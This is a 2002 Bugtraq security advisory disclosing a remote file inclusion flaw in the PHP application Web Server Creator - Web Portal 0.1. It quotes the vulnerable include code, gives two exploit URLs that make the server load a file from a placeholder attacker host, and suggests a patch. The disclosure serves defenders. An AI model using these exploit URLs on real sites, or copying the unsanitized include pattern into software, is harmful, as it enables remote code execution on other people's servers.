Bugtraq mailing list archives
Web Server Creator - Web Portal 0.1 (PHP)
From: "Frog Man" <leseulfrog () hotmail com>
Date: Mon, 25 Nov 2002 17:33:41 +0100
Informations : °°°°°°°°°°°°°° Website : http://webcreator.com02.com Tested version : 0.1 Problem : Include file PHP Code/Location : °°°°°°°°°°°°°°°°°°° news/include/customize.php : ------------------ <? $langfile = $l; include $l; ?> ------------------ index.php : ----------------------------------- [...] if (!$pg) { $pg = "acceuil"; } [...] require ("$pg.php"); ?> [...] ----------------------------------- Exploits : °°°°°°°°°° http://[target]/news/include/customize.php?l=http://[attacker]/file.txt with http://[attacker]/file.txt and http://[target]/index.php?pg=http://[attacker]/badfile with http://[attacker]/badfile.php Solution : °°°°°°°°°° - Delete bugged lines in news/include/customize.php - In index.php replce this line : require ("$pg.php"); by : ------------------- if (file_exists($pg.".php")){ require ("$pg.php"); } ------------------- A patch can be found on http://www.phpsecure.org. More details : °°°°°°°°°°°°°° In french : http://www.frog-man.org/tutos/WSC-WebPortal.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FWSC-WebPortal.txt&langpair=fr%7Cen&hl=fr&ie=ASCII&oe=ASCII frog-m@n _________________________________________________________________MSN Search, le moteur de recherche qui pense comme vous ! http://search.msn.fr/worldwide.asp
Current thread:
- Web Server Creator - Web Portal 0.1 (PHP) Frog Man (Nov 25)